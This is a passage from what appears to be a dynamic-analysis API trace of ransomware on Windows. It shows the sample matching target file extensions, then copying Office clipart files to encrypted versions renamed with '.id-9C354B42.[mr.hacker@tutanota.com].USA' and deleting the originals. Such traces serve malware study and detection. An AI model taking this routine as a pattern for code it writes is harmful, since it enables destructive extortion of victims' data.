returned 63 [0268.218] lstrlenW (lpString=".doc") returned 4 [0268.218] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0268.219] lstrlenW (lpString=".docx") returned 5 [0268.219] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0268.219] lstrlenW (lpString=".pdf") returned 4 [0268.219] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0268.219] lstrlenW (lpString=".xls") returned 4 [0268.219] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0268.219] lstrlenW (lpString=".xlsx") returned 5 [0268.219] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0268.219] lstrlenW (lpString=".ppt") returned 4 [0268.219] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0268.219] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF") returned 63 [0268.219] lstrlenW (lpString=".zip") returned 4 [0268.219] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0268.219] lstrlenW (lpString=".rar") returned 4 [0268.219] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0268.219] lstrlenW (lpString=".bz2") returned 4 [0268.219] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0268.219] lstrlenW (lpString=".7z") returned 3 [0268.219] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0268.219] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF") returned 63 [0268.219] lstrlenW (lpString=".dbf") returned 4 [0268.219] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0268.219] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF") returned 63 [0268.219] lstrlenW (lpString=".1cd") returned 4 [0268.219] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0268.220] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF") returned 63 [0268.220] lstrlenW (lpString=".jpg") returned 4 [0268.220] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0268.220] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF") returned 63 [0268.220] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF") returned 63 [0268.220] lstrlenW (lpString=".doc") returned 4 [0268.220] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0268.220] lstrlenW (lpString=".docx") returned 5 [0268.220] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0268.220] lstrlenW (lpString=".pdf") returned 4 [0268.220] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0268.220] lstrlenW (lpString=".xls") returned 4 [0268.220] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0268.220] lstrlenW (lpString=".xlsx") returned 5 [0268.220] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0268.220] lstrlenW (lpString=".ppt") returned 4 [0268.220] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0268.220] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF") returned 63 [0268.220] lstrlenW (lpString=".zip") returned 4 [0268.220] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0268.220] lstrlenW (lpString=".rar") returned 4 [0268.221] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0268.221] lstrlenW (lpString=".bz2") returned 4 [0268.221] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0268.221] lstrlenW (lpString=".7z") returned 3 [0268.221] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0268.221] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF") returned 63 [0268.221] lstrlenW (lpString=".dbf") returned 4 [0268.221] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0268.221] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF") returned 63 [0268.221] lstrlenW (lpString=".1cd") returned 4 [0268.221] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0268.221] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF") returned 63 [0268.221] lstrlenW (lpString=".jpg") returned 4 [0268.221] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0268.221] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0268.221] lstrlenW (lpString="DD00261_.WMF") returned 12 [0268.221] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00261_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0268.222] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x2fbff1c | out: lpFileSize=0x2fbff1c*=37974) returned 1 [0268.222] CloseHandle (hObject=0x384) returned 1 [0268.222] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00261_.wmf")) returned 0x20 [0268.222] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00261_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0268.222] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00261_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0268.222] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0268.222] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0268.222] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00261_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0268.225] GetLastError () returned 0x0 [0268.225] ReadFile (in: hFile=0x384, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x9456, lpOverlapped=0x0) returned 1 [0268.227] WriteFile (in: hFile=0x2ac, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0x9460, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0x9460, lpOverlapped=0x0) returned 1 [0268.229] ReadFile (in: hFile=0x384, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x0, lpOverlapped=0x0) returned 1 [0268.229] WriteFile (in: hFile=0x2ac, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0xec, lpOverlapped=0x0) returned 1 [0268.229] SetEndOfFile (hFile=0x2ac) returned 1 [0268.229] CloseHandle (hObject=0x2ac) returned 1 [0268.229] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0268.229] SetEndOfFile (hFile=0x384) returned 1 [0268.233] CloseHandle (hObject=0x384) returned 1 [0268.233] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0268.233] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00261_.wmf")) returned 1 [0268.233] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF") returned 63 [0268.233] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF") returned 63 [0268.233] lstrlenW (lpString=".doc") returned 4 [0268.233] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0268.233] lstrlenW (lpString=".docx") returned 5 [0268.234] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0268.234] lstrlenW (lpString=".pdf") returned 4 [0268.234] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0268.234] lstrlenW (lpString=".xls") returned 4 [0268.234] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0268.234] lstrlenW (lpString=".xlsx") returned 5 [0268.234] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0268.234] lstrlenW (lpString=".ppt") returned 4 [0268.234] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0268.234] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF") returned 63 [0268.234] lstrlenW (lpString=".zip") returned 4 [0268.234] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0268.234] lstrlenW (lpString=".rar") returned 4 [0268.234] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0268.234] lstrlenW (lpString=".bz2") returned 4 [0268.234] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0268.234] lstrlenW (lpString=".7z") returned 3 [0268.234] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0268.234] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF") returned 63 [0268.234] lstrlenW (lpString=".dbf") returned 4 [0268.234] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0268.234] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF") returned 63 [0268.234] lstrlenW (lpString=".1cd") returned 4 [0268.234] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0268.234] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF") returned 63 [0268.234] lstrlenW (lpString=".jpg") returned 4 [0268.234] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0268.234] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF") returned 63 [0268.235] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF") returned 63 [0268.235] lstrlenW (lpString=".doc") returned 4 [0268.235] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0268.235] lstrlenW (lpString=".docx") returned 5 [0268.235] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0268.235] lstrlenW (lpString=".pdf") returned 4 [0268.235] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0268.235] lstrlenW (lpString=".xls") returned 4 [0268.235] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0268.235] lstrlenW (lpString=".xlsx") returned 5 [0268.235] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0268.235] lstrlenW (lpString=".ppt") returned 4 [0268.235] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0268.235] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF") returned 63 [0268.235] lstrlenW (lpString=".zip") returned 4 [0268.235] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0268.235] lstrlenW (lpString=".rar") returned 4 [0268.235] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0268.235] lstrlenW (lpString=".bz2") returned 4 [0268.235] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0268.235] lstrlenW (lpString=".7z") returned 3 [0268.235] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0268.235] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF") returned 63 [0268.235] lstrlenW (lpString=".dbf") returned 4 [0268.235] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0268.235] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF") returned 63 [0268.235] lstrlenW (lpString=".1cd") returned 4 [0268.235] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0268.235] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF") returned 63 [0268.235] lstrlenW (lpString=".jpg") returned 4 [0268.235] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0268.236] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0268.236] lstrlenW (lpString="DD00297_.WMF") returned 12 [0268.236] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00297_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0268.236] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x2fbff1c | out: lpFileSize=0x2fbff1c*=40030) returned 1 [0268.236] CloseHandle (hObject=0x384) returned 1 [0268.236] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00297_.wmf")) returned 0x20 [0268.236] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00297_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0268.236] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00297_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0268.236] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0268.237] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0268.237] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00297_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0268.237] GetLastError () returned 0x0 [0268.237] ReadFile (in: hFile=0x384, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x9c5e, lpOverlapped=0x0) returned 1 [0268.239] WriteFile (in: hFile=0x2ac, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0x9c60, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0x9c60, lpOverlapped=0x0) returned 1 [0268.538] ReadFile (in: hFile=0x384, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x0, lpOverlapped=0x0) returned 1 [0268.538] WriteFile (in: hFile=0x2ac, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0xec, lpOverlapped=0x0) returned 1 [0268.538] SetEndOfFile (hFile=0x2ac) returned 1 [0268.538] CloseHandle (hObject=0x2ac) returned 1 [0268.538] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0268.538] SetEndOfFile (hFile=0x384) returned 1 [0269.123] CloseHandle (hObject=0x384) returned 1 [0269.124] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0269.144] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00297_.wmf")) returned 1 [0269.144] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF") returned 63 [0269.144] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF") returned 63 [0269.144] lstrlenW (lpString=".doc") returned 4 [0269.144] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.144] lstrlenW (lpString=".docx") returned 5 [0269.144] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.144] lstrlenW (lpString=".pdf") returned 4 [0269.144] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.144] lstrlenW (lpString=".xls") returned 4 [0269.144] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.144] lstrlenW (lpString=".xlsx") returned 5 [0269.144] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.144] lstrlenW (lpString=".ppt") returned 4 [0269.144] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.145] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF") returned 63 [0269.145] lstrlenW (lpString=".zip") returned 4 [0269.145] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.145] lstrlenW (lpString=".rar") returned 4 [0269.145] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.145] lstrlenW (lpString=".bz2") returned 4 [0269.145] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.145] lstrlenW (lpString=".7z") returned 3 [0269.145] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.145] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF") returned 63 [0269.145] lstrlenW (lpString=".dbf") returned 4 [0269.145] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.145] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF") returned 63 [0269.145] lstrlenW (lpString=".1cd") returned 4 [0269.145] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.145] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF") returned 63 [0269.145] lstrlenW (lpString=".jpg") returned 4 [0269.145] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.145] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF") returned 63 [0269.145] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF") returned 63 [0269.145] lstrlenW (lpString=".doc") returned 4 [0269.145] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.145] lstrlenW (lpString=".docx") returned 5 [0269.145] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.145] lstrlenW (lpString=".pdf") returned 4 [0269.145] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.145] lstrlenW (lpString=".xls") returned 4 [0269.145] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.146] lstrlenW (lpString=".xlsx") returned 5 [0269.146] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.146] lstrlenW (lpString=".ppt") returned 4 [0269.146] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.146] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF") returned 63 [0269.146] lstrlenW (lpString=".zip") returned 4 [0269.146] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.146] lstrlenW (lpString=".rar") returned 4 [0269.146] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.146] lstrlenW (lpString=".bz2") returned 4 [0269.146] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.146] lstrlenW (lpString=".7z") returned 3 [0269.146] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.146] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF") returned 63 [0269.146] lstrlenW (lpString=".dbf") returned 4 [0269.146] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.146] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF") returned 63 [0269.146] lstrlenW (lpString=".1cd") returned 4 [0269.146] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.146] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF") returned 63 [0269.146] lstrlenW (lpString=".jpg") returned 4 [0269.146] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.146] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0269.146] lstrlenW (lpString="DD01139_.WMF") returned 12 [0269.147] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01139_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0269.159] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x2fbff1c | out: lpFileSize=0x2fbff1c*=3632) returned 1 [0269.159] CloseHandle (hObject=0x348) returned 1 [0269.159] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01139_.wmf")) returned 0x20 [0269.184] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01139_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0269.184] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01139_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0269.184] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0269.184] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0269.184] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01139_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0269.191] GetLastError () returned 0x0 [0269.191] ReadFile (in: hFile=0x2b4, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0xe30, lpOverlapped=0x0) returned 1 [0269.192] WriteFile (in: hFile=0x384, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0xe40, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0xe40, lpOverlapped=0x0) returned 1 [0269.193] ReadFile (in: hFile=0x2b4, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x0, lpOverlapped=0x0) returned 1 [0269.193] WriteFile (in: hFile=0x384, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0xec, lpOverlapped=0x0) returned 1 [0269.193] SetEndOfFile (hFile=0x384) returned 1 [0269.193] CloseHandle (hObject=0x384) returned 1 [0269.193] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0269.193] SetEndOfFile (hFile=0x2b4) returned 1 [0269.195] CloseHandle (hObject=0x2b4) returned 1 [0269.195] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0269.196] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01139_.wmf")) returned 1 [0269.197] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF") returned 63 [0269.197] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF") returned 63 [0269.197] lstrlenW (lpString=".doc") returned 4 [0269.197] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.197] lstrlenW (lpString=".docx") returned 5 [0269.197] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.197] lstrlenW (lpString=".pdf") returned 4 [0269.197] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.197] lstrlenW (lpString=".xls") returned 4 [0269.197] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.197] lstrlenW (lpString=".xlsx") returned 5 [0269.197] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.197] 